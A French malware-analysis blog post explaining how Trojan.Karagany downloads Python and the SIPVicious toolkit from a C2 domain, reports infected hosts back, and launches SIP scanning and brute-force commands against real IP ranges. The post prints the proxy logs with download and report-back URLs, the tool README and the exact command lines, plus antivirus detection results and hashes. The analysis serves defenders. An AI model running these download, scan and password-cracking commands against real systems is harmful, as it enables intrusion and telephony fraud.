Trojan.Karagany et Sip Hacker/Sip Vicious

Un pack Trojan.Karagny par exploits sur site WEB peux dropper actuellement un pack Sip Hacker.

Le malware contacte les URL suivantes :

1314008822.953     81 192.168.1.27 TCP_MISS/200 304 GET http://vivahot.cz.cc/ipcheck.php?action=getip – DIRECT/188.72.216.155 text/html
1314008838.371  15416 192.168.1.27 TCP_MISS/200 16003458 GET http://vivahot.cz.cc/python27.msi – DIRECT/188.72.216.155 application/x-msdownload
1314009021.630    326 192.168.1.27 TCP_MISS/200 246655 GET http://vivahot.cz.cc/UnRAR.exe – DIRECT/188.72.216.155 application/x-msdownload
1314009022.028    376 192.168.1.27 TCP_MISS/200 321251 GET http://vivahot.cz.cc/sip.rar – DIRECT/188.72.216.155 application/x-rar-compressed
1314011456.841    125 192.168.1.27 TCP_MISS/200 301 GET http://vivahot.cz.cc/insert.php?action=insert&tbname=sip_log&Computer=MAKKK&Host=NULL&User=Null&Pass=Null – DIRECT/188.72.216.155 text/html
1314012388.048     72 192.168.1.27 TCP_MISS/200 290 GET http://vivahot.cz.cc/insert.php?action=insert&tbname=sip_log&Computer=MAKKK&Host=NULL&User=Null&Pass=Null – DIRECT/188.72.216.155 text/html
 

qui  installe donc Python, puis telecharge unrar et un fichier sip.rar qui est un pack SIPVicious security tools

 
Welcome to SIPVicious security tools.
The 4 tools that you should be looking at are:
– svmap
– svwar
– svcrack
– svreportThe tools:
svmap – this is a sip scanner. When launched against
ranges of ip address space, it will identify any SIP servers
which it finds on the way. Also has the option to scan hosts
on ranges of ports.svwar – identifies working extension lines on a PBX. A working
extension is one that can be registered.
Also tells you if the extension line requires authentication or not.svcrack – a password cracker making use of digest authentication.
It is able to crack passwords on both registrar servers and proxy
servers. Current cracking modes are either numeric ranges or
words from dictionary files.svreport – able to manage sessions created by the rest of the tools
and export to pdf, xml, csv and plain text.

svlearnfp – allows you to generate new fingerprints by simply running
the tool against a host. It will attempt to guess most values and allow
you to save the information to the local fingerprint db. Then you can
choose to upload it to the author so that it can be added to the database.

 
 

Le malware se copie sous les fichiers jqs.exe et notpad.exe

 

Python est installé sur C:\Python27 avec les scripts du pack SIPVicious

Deux fichiers dans notre cas, users.txt et parole.txt contienne le dictionnaire du couple utilisateur/mot de passe qui seront tentés.

puis le malware lance le script via Python avec les bon paramètres :

C:\WINDOWS\system32\cmd.exe /c C:\Python27\python.exe C:\Python27\svwar.py -v -e100-9999 81.202.22.91 &
C:\Python27\Python.exe C:\Python27\svmap.py 81.202.*.*

Le but étant de lancer des scans afin de détecter des serveurs SIP et tenter de cracker par une attaque bruteforce.

Exemple de détection du dropper qui est détecté en Worm.Win32. Rebhip :

 

File name: calc.exe
Submission date: 2011-08-22 06:25:23 (UTC)
Current status: finished
Result: 15 /41 (36.6%)
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.08.22.01 2011.08.22 –
AntiVir 7.11.13.155 2011.08.21 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2011.08.21 –
Avast 4.8.1351.0 2011.08.21 Win32:Kryptik-EJF [Trj]
Avast5 5.0.677.0 2011.08.21 Win32:Kryptik-EJF [Trj]
AVG 10.0.0.1190 2011.08.21 Generic24.AIIW.dropper
BitDefender 7.2 2011.08.22 –
ByteHero 1.0.0.1 2011.08.22 Trojan.Win32.Heur.Gen
CAT-QuickHeal 11.00 2011.08.22 –
ClamAV 0.97.0.0 2011.08.22 –
Commtouch 5.3.2.6 2011.08.21 –
Comodo 9829 2011.08.22 Heur.Suspicious
DrWeb 5.0.2.03300 2011.08.22 Trojan.DownLoader4.46923
Emsisoft 5.1.0.10 2011.08.22 Worm.Win32.Rebhip!IK
eSafe 7.0.17.0 2011.08.21 –
eTrust-Vet 36.1.8511 2011.08.19 –
F-Prot 4.6.2.117 2011.08.21 –
F-Secure 9.0.16440.0 2011.08.22 –
Fortinet 4.2.257.0 2011.08.22 –
GData 22 2011.08.22 Win32:Kryptik-EJF
Ikarus T3.1.1.107.0 2011.08.22 Worm.Win32.Rebhip
Jiangmin 13.0.900 2011.08.21 –
K7AntiVirus 9.110.5037 2011.08.20 –
McAfee 5.400.0.1158 2011.08.22 Artemis!90F3E250A02E
McAfee-GW-Edition 2010.1D 2011.08.21 Artemis!90F3E250A02E
Microsoft 1.7604 2011.08.22 –
Norman 6.07.10 2011.08.20 –
nProtect 2011-08-21.01 2011.08.21 Trojan/W32.Agent.116224.BA
Panda 10.0.3.5 2011.08.21 Suspicious file
PCTools 8.0.0.5 2011.08.22 –
Prevx 3.0 2011.08.22 Medium Risk Malware
Rising 23.71.03.03 2011.08.18 –
Sophos 4.68.0 2011.08.22 –
SUPERAntiSpyware 4.40.0.1006 2011.08.20 –
Symantec 20111.2.0.82 2011.08.22 –
TheHacker 6.7.0.1.282 2011.08.22 –
TrendMicro 9.500.0.1008 2011.08.17 –
TrendMicro-HouseCall 9.500.0.1008 2011.08.22 –
VIPRE 10239 2011.08.22 –
ViRobot 2011.8.22.4632 2011.08.22 –
VirusBuster 14.0.179.0 2011.08.21 –
Additional informationShow all
MD5   : 90f3e250a02e5e93e2da6e410bd597dc
SHA1  : 320002242f32e2107f87c9f848e939d566574dc6
SHA256: f4eae95805c94137e1603c1b3c736a306b93989058b9e0e25b0607cce5cb4122

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 36 times, 1 visits today)

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *